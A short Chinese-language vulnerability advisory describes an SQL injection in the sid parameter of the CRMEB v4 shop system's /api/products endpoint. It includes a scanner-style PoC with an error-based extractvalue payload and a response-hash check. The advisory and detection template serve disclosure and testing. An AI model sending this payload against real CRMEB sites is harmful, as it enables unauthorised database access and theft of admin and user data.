1.漏洞描述
CRMEB打通版v4是免费开源商城系统,UINAPP+thinkphp6框架商城.CRMEB打通版/api/products路径下的sid参数存在未经过滤的SQL语句拼接导致SQL注入。
攻击者除了可以利⽤ SQL 注⼊漏洞获取数据库中的信息(例如,管理员后台密码、站点的⽤户个⼈信息)之外,甚⾄在⾼权限的情况可向服务器中写⼊⽊⻢,进⼀步获取服务器系统权限。
2.漏洞背景
漏洞类型:SQL注入
威胁等级:高危
披露日期:2023/10/9
Exp:暂无
3.影响范围
4.poc
relative: req0
session: false
requests:
method: GET
timeout: 10
path: /api/products?page=1&limit=8&keyword=keyword&sid=extractvalue(1,concat(char(126),md5(118)))&news=0&priceOrder=&salesOrder=
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/80.0.374.113 Safari/537.36
follow_redirects: false
matches: (code.eq("200") && body.contains("5ef059938ba799aaa845e1c2e8a762b"))